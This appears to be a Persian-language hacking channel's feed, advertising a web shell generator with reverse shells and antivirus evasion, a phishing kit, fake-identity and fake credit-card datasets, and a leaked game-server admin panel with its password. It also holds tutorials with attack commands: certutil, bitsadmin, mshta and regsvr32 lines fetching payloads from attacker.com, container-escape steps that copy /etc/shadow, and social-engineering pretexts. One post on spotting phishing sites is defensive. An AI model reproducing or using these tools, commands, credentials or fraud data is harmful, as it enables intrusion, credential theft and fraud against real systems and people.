Shell 🐚 Generator.html
41.4 KB
Shell Generator 🐚 DarkPacket
یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash
هر زبان قابلیتهای مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration
پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی
قابلیتهای پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یککلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهمسازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتیویروس
یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash
هر زبان قابلیتهای مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration
پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی
قابلیتهای پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یککلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهمسازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتیویروس
Java Shell 🐚 Generator.html
48.9 KB
ساخت شل جاوا
❤6
user-agents-100000.txt
11.9 MB
دیتابیس عظیم و بسیار قدرتمندی که شامل مجموعهای کامل از ۱۰۰ هزار User-Agent سالم، معتبر و بهروز است.
این پایگاه داده با ارائه طیف وسیعی از شناسههای کاربری استاندارد و غیراستاندارد، امکان شبیهسازی دقیق ترافیک وب را فراهم میکند و برای توسعهدهندگان، برنامهنویسان و متخصصان امنیت سایبری که نیاز به تستهای جامع پراکسی، اسکریپتنویسی خودکار یا تحلیل رفتار مرورگرها دارند، منبعی ایدهآل و غنی به شمار میرود.
all_ipv4_500ips.zip
210.8 KB
دیتابیس ارائهشده شامل مجموعهای بسیار گسترده و جامع از آدرسهای اینترنتی نسخه چهار (IPv4) است که پوششدهی جغرافیای آن به ۹۵ کشور مختلف در سراسر جهان گسترش دارد.
این پایگاه داده با ارائه اطلاعات دقیق و بهروز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم میکند. بهعنوان یک نمونه از ظرفیت و تنوع این دیتابیس، میتوان به وجود حداقل ۵۰۰ آدرس IP منحصربهفرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از دادهها نشاندهنده عمق و گستردگی پوششدهی شبکهای در سطح بینالمللی است و برای پروژههایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسیها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار میرود.
all_ipv6_500ips.zip
551.4 KB
دیتابیس ارائهشده شامل مجموعهای بسیار گسترده و جامع از آدرسهای اینترنتی نسخه چهار (IPv6) است که پوششدهی جغرافیای آن به ۹۲ کشور مختلف در سراسر جهان گسترش دارد.
این پایگاه داده با ارائه اطلاعات دقیق و بهروز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم میکند. بهعنوان یک نمونه از ظرفیت و تنوع این دیتابیس، میتوان به وجود حداقل ۵۰۰ آدرس IP منحصربهفرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از دادهها نشاندهنده عمق و گستردگی پوششدهی شبکهای در سطح بینالمللی است و برای پروژههایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسیها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار میرود.
fake_identities_10countries_10cities_100pergender_2026-09-11.zip
15.3 MB
دیتابیس بسیار قوی شامل ۲۰ هزار اطلاعات داینامیک برای هویت جعلی.
۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.
۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.
[PERSONAL]: مشخصات فردی
First Name: نام کوچک واقعی بر اساس کشور و جنسیت
Last Name: نام خانوادگی واقعی بر اساس کشور
Full Name: نام کامل
Gender: Male یا Female
Age: بین ۱۸ تا ۲۶ سال
Birth Year: سال تولد
Nationality: نام کشور
[CONTACT]: اطلاعات تماس
Email: ساختهشده از نام و فامیل
Phone: شماره با کد کشور، مثلاً +98 912 345 6789
Phone (Raw): شماره بدون فرمت
Street: خیابان و پلاک بر اساس خیابانهای واقعی هر کشور
City: شهر
Postal Code: با الگوی واقعی هر کشور، مثلاً ایران ۱۰ رقم و آمریکا ۵ رقم
Country: کشور
[NETWORK]: اطلاعات شبکه
IPv4: با پیشوند شبیه کشور، مثلاً 5.x.x.x برای ایران
MAC Address: آدرس مک تصادفی
[MISC]: اطلاعات متفرقه
Username: نام کاربری
Password: رمز عبور تصادفی
Credit Card: شماره کارت ساختگی با پیشوند ۴
IBAN: شماره شبا ساختگی
proxies-1786199678869.txt
59.7 KB
بیشاز ۱ هزار پروکسی CORS قدرتمند استخراج شده از سایت corsproxy.io
ports.compact.json
822.4 KB
تمام (۶۵۵۳۵) پورتهای جهان + سرویس ارائه دهندهی آنها در قالب JSON
DigitalIdentityProfiles (1) (1).zip
25.4 MB
مخزن اطلاعات قدرتمند برای جعل اطلاعات
۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویسدهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویسدهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
panel.html
141.6 KB
پنل دیتابیس سرور بازی امپراتوری پارس
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.
رمز دسترسی به پنل مدیریت:
empire2024
برای افزایش سطح امنیت شبکه و جلوگیری از دسترسیهای غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS میباشد که امکان استفاده امن و مخفیانه از سرویسها را فراهم میکند.
توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچگونه ارتباطی با تولیدکنندگان محتوا ندارد.
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.
رمز دسترسی به پنل مدیریت:
برای افزایش سطح امنیت شبکه و جلوگیری از دسترسیهای غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS میباشد که امکان استفاده امن و مخفیانه از سرویسها را فراهم میکند.
توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچگونه ارتباطی با تولیدکنندگان محتوا ندارد.
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai
قابلیتهای گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیتهاب (GitHub) برای مدیریت کدها و پروژهها، ویکیپدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعهای از سایتهای تخصصی اطلاعاتی و پایگاههای داده، امکان جمعآوری و پردازش حجم عظیمی از دادهها را فراهم میسازد.
- ابزارهای حرفهای OSINT (هوشیابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمعآوری اطلاعات از منابع باز را بهشکل خودکار و دقیق تسهیل میکند. این قابلیت برای تحلیلهای عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصیسازی بالا و انعطافپذیری: کاربران میتوانند با تنظیمات دقیق و شخصیسازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجیها کاملاً متناسب با اهداف آنها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش همزمان درخواستها و پاسخگویی سریع، Nullspire Ai برای انجام پروژههای بزرگ و پیچیده ایدهآل است.
❤5
sensitive-paths (2).zip
87.6 KB
Sensitive Path Wordlist Collection
مجموعه کامل مسیرها و payloadهای حساس برای تست نفوذ وب - نسخه 2026
فایلها: 23
مسیرها: ۳٬۸۶۵
CVE: 307
مجموعه کامل مسیرها و payloadهای حساس برای تست نفوذ وب - نسخه 2026
فایلها: 23
مسیرها: ۳٬۸۶۵
CVE: 307
❤7
Fishing_Monitor.html
64.4 KB
فایل کامل شامل نمونه کد فیشینگ وب، پنل مدیریتی و آموزش گامبهگام که همه درون یک فایل واحد قرار دارند.
توجه داشته باشید که مسئولیت هرگونه سوءاستفاده یا استفاده غیرمجاز از این محتوا بر عهده کاربر است و ما هیچ مسئولیتی در قبال اقدامات شما نمیپذیریم.
توجه داشته باشید که مسئولیت هرگونه سوءاستفاده یا استفاده غیرمجاز از این محتوا بر عهده کاربر است و ما هیچ مسئولیتی در قبال اقدامات شما نمیپذیریم.
❤8
عزیزان، ریاکشن ها رو بترکونید... 😂🌹
همینطوری که من کانال رو ترکوندم... 😂
همینطوری که من کانال رو ترکوندم... 😂
❤13
پورتهایی که هر هکری باید حفظ باشه
یه سری پورت هست که دیدنشون یعنی یه جای کار میلنگه.
۲۱ FTP
اگه باز باشه و Anonymous Login فعال باشه، یعنی فاجعه.
ftp target.com
یوزر: anonymous
پسورد: خالی
۲۲ SSH
هدف شماره یک Brute Force.
اگه پسورد ضعیف باشه، تو چند دقیقه کرک میشه.
۲۳ Telnet
کاملاً ناامن. همه چی Plain Text.
حتی پسورد هم رمزنگاری نشده.
جایگزینش: SSH
۲۵ SMTP
اگه Open Relay باشه، میتونی با اون ایمیل اسپم بفرستی.
یعنی سرور تو رو به عنوان پل استفاده میکنه.
۴۴۵ SMB
هدف EternalBlue و WannaCry.
اگه ویندوز قدیمی و پچ نشده باشه، فاجعه.
۳۳۰۶ MySQL
اگه از بیرون باز باشه و پسورد root خالی باشه:
mysql -h target.com -u root
مستقیم میری تو دیتابیس.
۳۳۸۹ RDP
هدف BlueKeep.
اگه ویندوز XP یا 7 باشه، اکسپلویت آمادهست.
۵۹۰۰ VNC
معمولاً پسورد کوتاه یا بدون پسورد.
مستقیم کنترل دسکتاپ.
نکته:
nmap -sV -p 21,22,23,25,445,3306,3389,5900 target.com
#ℳℴ𝒷𝒾𝓃
یه سری پورت هست که دیدنشون یعنی یه جای کار میلنگه.
۲۱ FTP
اگه باز باشه و Anonymous Login فعال باشه، یعنی فاجعه.
ftp target.com
یوزر: anonymous
پسورد: خالی
۲۲ SSH
هدف شماره یک Brute Force.
اگه پسورد ضعیف باشه، تو چند دقیقه کرک میشه.
۲۳ Telnet
کاملاً ناامن. همه چی Plain Text.
حتی پسورد هم رمزنگاری نشده.
جایگزینش: SSH
۲۵ SMTP
اگه Open Relay باشه، میتونی با اون ایمیل اسپم بفرستی.
یعنی سرور تو رو به عنوان پل استفاده میکنه.
۴۴۵ SMB
هدف EternalBlue و WannaCry.
اگه ویندوز قدیمی و پچ نشده باشه، فاجعه.
۳۳۰۶ MySQL
اگه از بیرون باز باشه و پسورد root خالی باشه:
mysql -h target.com -u root
مستقیم میری تو دیتابیس.
۳۳۸۹ RDP
هدف BlueKeep.
اگه ویندوز XP یا 7 باشه، اکسپلویت آمادهست.
۵۹۰۰ VNC
معمولاً پسورد کوتاه یا بدون پسورد.
مستقیم کنترل دسکتاپ.
نکته:
nmap -sV -p 21,22,23,25,445,3306,3389,5900 target.com
#ℳℴ𝒷𝒾𝓃
❤8
چطور بفهمیم یه سایت HTTPS واقعیه یا قلابی
همه فکر میکنن قفل کنار آدرس یعنی سایت امنه.
ولی فیشینگها هم میتونن قفل داشته باشن.
اول: دامنه رو حرف به حرف بخون
paypal.com با paypa1.com
google.com با goog1e.com
microsoft.com با rnicrosoft.com
بعضی حروف تو فونتهای خاص شبیه همن.
m با rn، l با I، O با 0.
دوم: گواهی SSL رو چک کن
کلیک کن روی قفل، View Certificate رو بزن.
صادرکننده کی؟ Let's Encrypt عادیه.
تاریخ انقضا؟
اسم دامنه دقیقاً همونیه؟
سوم: از ابزار استفاده کن
curl -vI https://example.com 2>&1 | grep -i "subject\|issuer\|expire"
چهارم: گوگل Safe Browsing
برو به:
https://transparencyreport.google.com/safe-browsing/search
دامنه رو بذار، ببین قرمز نیست.
نکته طلایی:
اگه لینکی تو ایمیل یا پیامک اومد، هیچوقت مستقیم کلیک نکن.
دستی تو مرورگر تایپ کن.
#ℳℴ𝒷𝒾𝓃
همه فکر میکنن قفل کنار آدرس یعنی سایت امنه.
ولی فیشینگها هم میتونن قفل داشته باشن.
اول: دامنه رو حرف به حرف بخون
paypal.com با paypa1.com
google.com با goog1e.com
microsoft.com با rnicrosoft.com
بعضی حروف تو فونتهای خاص شبیه همن.
m با rn، l با I، O با 0.
دوم: گواهی SSL رو چک کن
کلیک کن روی قفل، View Certificate رو بزن.
صادرکننده کی؟ Let's Encrypt عادیه.
تاریخ انقضا؟
اسم دامنه دقیقاً همونیه؟
سوم: از ابزار استفاده کن
curl -vI https://example.com 2>&1 | grep -i "subject\|issuer\|expire"
چهارم: گوگل Safe Browsing
برو به:
https://transparencyreport.google.com/safe-browsing/search
دامنه رو بذار، ببین قرمز نیست.
نکته طلایی:
اگه لینکی تو ایمیل یا پیامک اومد، هیچوقت مستقیم کلیک نکن.
دستی تو مرورگر تایپ کن.
#ℳℴ𝒷𝒾𝓃
❤6
Living off the Land، هنر استفاده از خود ویندوز
هکرهای آماتور بدافزار میارن تو سیستم.
حرفهایها از خود ابزارهای ویندوز استفاده میکنن.
چرا؟
چون این ابزارها خود ویندوزن.
آنتیویروس بهشون شک نمیکنه.
لاگها هم میگن "یه برنامه رسمی مایکروسافت اجرا شد".
نمونههاش:
certutil -urlcache -f http://attacker.com/payload.exe
یه ابزار رسمی ویندوزه که برای دانلود گواهی طراحی شده.
ولی میتونی باهاش هر فایلی دانلود کنی.
bitsadmin /transfer job http://attacker.com/file.exe C:\temp\file.exe
سرویس رسمی ویندوز برای دانلود آپدیت.
میتونی ازش برای دانلود هر چیزی استفاده کنی.
mshta http://attacker.com/script.hta
اجرای اسکریپت از راه دور.
هیچ فایلی رو دیسک ذخیره نمیشه.
regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll
اجرای اسکریپت از راه دور.
با یه DLL رسمی ویندوز.
wmic process call create "cmd /c payload"
اجرای پروسه از راه دور.
برای همین میگن، بدافزار مدرن لازم نیست فایل باشه.
کافیه از خود ویندوز استفاده کنی.
#ℳℴ𝒷𝒾𝓃
هکرهای آماتور بدافزار میارن تو سیستم.
حرفهایها از خود ابزارهای ویندوز استفاده میکنن.
چرا؟
چون این ابزارها خود ویندوزن.
آنتیویروس بهشون شک نمیکنه.
لاگها هم میگن "یه برنامه رسمی مایکروسافت اجرا شد".
نمونههاش:
certutil -urlcache -f http://attacker.com/payload.exe
یه ابزار رسمی ویندوزه که برای دانلود گواهی طراحی شده.
ولی میتونی باهاش هر فایلی دانلود کنی.
bitsadmin /transfer job http://attacker.com/file.exe C:\temp\file.exe
سرویس رسمی ویندوز برای دانلود آپدیت.
میتونی ازش برای دانلود هر چیزی استفاده کنی.
mshta http://attacker.com/script.hta
اجرای اسکریپت از راه دور.
هیچ فایلی رو دیسک ذخیره نمیشه.
regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll
اجرای اسکریپت از راه دور.
با یه DLL رسمی ویندوز.
wmic process call create "cmd /c payload"
اجرای پروسه از راه دور.
برای همین میگن، بدافزار مدرن لازم نیست فایل باشه.
کافیه از خود ویندوز استفاده کنی.
#ℳℴ𝒷𝒾𝓃
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
❤8
Container Escape، فرار از داکر
فرض کن یه اپلیکیشن وب رو هک کردی که تو داکر اجرا میشه.
حالا داخل کانتینری. ولی هدف، خود میزبانه.
راههای فرار:
۱. دسترسی به Docker Socket
اگه /var/run/docker.sock تو کانتینر مانت شده باشه:
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu
حالا کل هارد میزبان رو داری.
۲. Privileged Container
اگه کانتینر با --privileged اجرا شده:
mount /dev/sda1 /mnt
chroot /mnt
حالا root میزبان هستی.
۳. Kernel Exploit
اگه نسخه کرنل آسیبپذیر باشه،
از داخل کانتینر، کرنل رو اکسپلویت میکنی.
مثل Dirty COW, Dirty Pipe.
۴. cgroup Escape
اگه cgroup v1 باشه و release_agent قابل نوشتن:
echo '#!/bin/sh' > /tmp/exploit.sh
echo 'cat /etc/shadow > /tmp/shadow' >> /tmp/exploit.sh
chmod +x /tmp/exploit.sh
echo /tmp/exploit.sh > /sys/fs/cgroup/release_agent
۵. CAP_SYS_ADMIN
اگه این Capability رو داشته باشی:
mount -t cgroup -o rdma cgroup /tmp/cgrp
یه سری تنظیمات، بعد فرار.
دفاع:
کانتینر رو non-root اجرا کن.
--privileged رو حذف کن.
Docker Socket رو داخل کانتینر نذار.
از Seccomp و AppArmor استفاده کن.
#ℳℴ𝒷𝒾𝓃
فرض کن یه اپلیکیشن وب رو هک کردی که تو داکر اجرا میشه.
حالا داخل کانتینری. ولی هدف، خود میزبانه.
راههای فرار:
۱. دسترسی به Docker Socket
اگه /var/run/docker.sock تو کانتینر مانت شده باشه:
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu
حالا کل هارد میزبان رو داری.
۲. Privileged Container
اگه کانتینر با --privileged اجرا شده:
mount /dev/sda1 /mnt
chroot /mnt
حالا root میزبان هستی.
۳. Kernel Exploit
اگه نسخه کرنل آسیبپذیر باشه،
از داخل کانتینر، کرنل رو اکسپلویت میکنی.
مثل Dirty COW, Dirty Pipe.
۴. cgroup Escape
اگه cgroup v1 باشه و release_agent قابل نوشتن:
echo '#!/bin/sh' > /tmp/exploit.sh
echo 'cat /etc/shadow > /tmp/shadow' >> /tmp/exploit.sh
chmod +x /tmp/exploit.sh
echo /tmp/exploit.sh > /sys/fs/cgroup/release_agent
۵. CAP_SYS_ADMIN
اگه این Capability رو داشته باشی:
mount -t cgroup -o rdma cgroup /tmp/cgrp
یه سری تنظیمات، بعد فرار.
دفاع:
کانتینر رو non-root اجرا کن.
--privileged رو حذف کن.
Docker Socket رو داخل کانتینر نذار.
از Seccomp و AppArmor استفاده کن.
#ℳℴ𝒷𝒾𝓃
❤6
آسیبپذیریهای منطقی، بدترین نوع باگ
بعضی باگها تکنیکی نیستن.
فقط یه فکر اشتباه تو منطق برنامهست.
مثال ۱: کد تخفیف
یه فروشگاه آنلاین کد تخفیف داره: OFF50
وقتی میزنی، ۵۰٪ تخفیف میگیری.
حالا اگه یه بار دیگه بزنی چی میشه؟
بعضی سایتها چک نمیکنن که کد قبلاً استفاده شده یا نه.
پس میتونی بینهایت تخفیف بگیری.
مثال ۲: تغییر قیمت
وقتی یه محصول رو به سبد اضافه میکنی،
قیمت تو یه فیلد مخفی تو فرم ذخیره میشه.
حالا اگه قیمت رو از ۱۰۰۰ به ۱ تغییر بدی چی؟
بعضی سایتها قیمت رو از سمت کاربر میخونن.
یعنی تو میتونی محصول رو یه تومان بخری.
مثال ۳: تغییر ID
example.com/order/1234
اگه 1234 رو به 1235 تغییر بدی چی؟
اگه سفارش کاربر دیگه رو ببینی، یعنی IDOR داری.
یعنی دسترسی کنترل درست پیاده نشده.
مثال ۴: پنل ادمین مخفی
example.com/admin
اگه صفحه لود نشد، یعنی فقط بر اساس URL چک میکنه.
اگه با یه هدر خاص بفرستی، شاید لود شه.
X-Forwarded-For: 127.0.0.1
چون خیلی از سرورها فکر میکنن درخواست از لوکاله.
#ℳℴ𝒷𝒾𝓃
بعضی باگها تکنیکی نیستن.
فقط یه فکر اشتباه تو منطق برنامهست.
مثال ۱: کد تخفیف
یه فروشگاه آنلاین کد تخفیف داره: OFF50
وقتی میزنی، ۵۰٪ تخفیف میگیری.
حالا اگه یه بار دیگه بزنی چی میشه؟
بعضی سایتها چک نمیکنن که کد قبلاً استفاده شده یا نه.
پس میتونی بینهایت تخفیف بگیری.
مثال ۲: تغییر قیمت
وقتی یه محصول رو به سبد اضافه میکنی،
قیمت تو یه فیلد مخفی تو فرم ذخیره میشه.
حالا اگه قیمت رو از ۱۰۰۰ به ۱ تغییر بدی چی؟
بعضی سایتها قیمت رو از سمت کاربر میخونن.
یعنی تو میتونی محصول رو یه تومان بخری.
مثال ۳: تغییر ID
example.com/order/1234
اگه 1234 رو به 1235 تغییر بدی چی؟
اگه سفارش کاربر دیگه رو ببینی، یعنی IDOR داری.
یعنی دسترسی کنترل درست پیاده نشده.
مثال ۴: پنل ادمین مخفی
example.com/admin
اگه صفحه لود نشد، یعنی فقط بر اساس URL چک میکنه.
اگه با یه هدر خاص بفرستی، شاید لود شه.
X-Forwarded-For: 127.0.0.1
چون خیلی از سرورها فکر میکنن درخواست از لوکاله.
#ℳℴ𝒷𝒾𝓃
❤6
مهندسی اجتماعی، حمله به انسان نه سیستم
بعضی وقتا نیازی نیست سیستمی رو هک کنی.
کافیه آدمش رو هک کنی.
۱. Pretexting
یه داستان میسازی که قابل باور باشه.
مثلاً خودت رو از IT شرکت جا میزنی و میگی:
"سلام، ما یه مشکل امنیتی تو سیستم شما دیدیم، برای تأیید، پسورد فعلی رو بگید."
۲. Baiting
یه فلش تو پارکینگ شرکت میندازی.
روش نوشته: "حقوق کارمندان ۱۴۰۳"
کارمند پیدا میکنه، فلش رو میزنه به سیستم.
بدافزار اجرا میشه.
۳. Tailgating
پشت یه کارمند وارد ساختمان اداری میشی.
دست پرته، کارتت رو میزنی، بعد تو هم رد میشی.
هیچکس نمیپرسه تو کی هستی.
۴. Quid Pro Quo
یه تماس میگیری، خودت رو از پشتیبانی جا میزنی.
میگی: "ما یه مشکل داریم، اگه کمک کنی یه تخفیف ویژه میگیری."
۵. Vishing
پیام صوتی میفرستی، خودت رو بانک جا میزنی.
"حساب شما مشکوک به کلاهبرداریه، برای تأیید شماره کارت رو بگید."
دفاع:
هیچوقت اطلاعات حساس رو تلفنی یا ایمیلی ندید.
همیشه هویت طرف رو از راه دیگه چک کنید.
آموزش کارمندان مهمترین لایه امنیته.
#ℳℴ𝒷𝒾𝓃
بعضی وقتا نیازی نیست سیستمی رو هک کنی.
کافیه آدمش رو هک کنی.
۱. Pretexting
یه داستان میسازی که قابل باور باشه.
مثلاً خودت رو از IT شرکت جا میزنی و میگی:
"سلام، ما یه مشکل امنیتی تو سیستم شما دیدیم، برای تأیید، پسورد فعلی رو بگید."
۲. Baiting
یه فلش تو پارکینگ شرکت میندازی.
روش نوشته: "حقوق کارمندان ۱۴۰۳"
کارمند پیدا میکنه، فلش رو میزنه به سیستم.
بدافزار اجرا میشه.
۳. Tailgating
پشت یه کارمند وارد ساختمان اداری میشی.
دست پرته، کارتت رو میزنی، بعد تو هم رد میشی.
هیچکس نمیپرسه تو کی هستی.
۴. Quid Pro Quo
یه تماس میگیری، خودت رو از پشتیبانی جا میزنی.
میگی: "ما یه مشکل داریم، اگه کمک کنی یه تخفیف ویژه میگیری."
۵. Vishing
پیام صوتی میفرستی، خودت رو بانک جا میزنی.
"حساب شما مشکوک به کلاهبرداریه، برای تأیید شماره کارت رو بگید."
دفاع:
هیچوقت اطلاعات حساس رو تلفنی یا ایمیلی ندید.
همیشه هویت طرف رو از راه دیگه چک کنید.
آموزش کارمندان مهمترین لایه امنیته.
#ℳℴ𝒷𝒾𝓃
❤7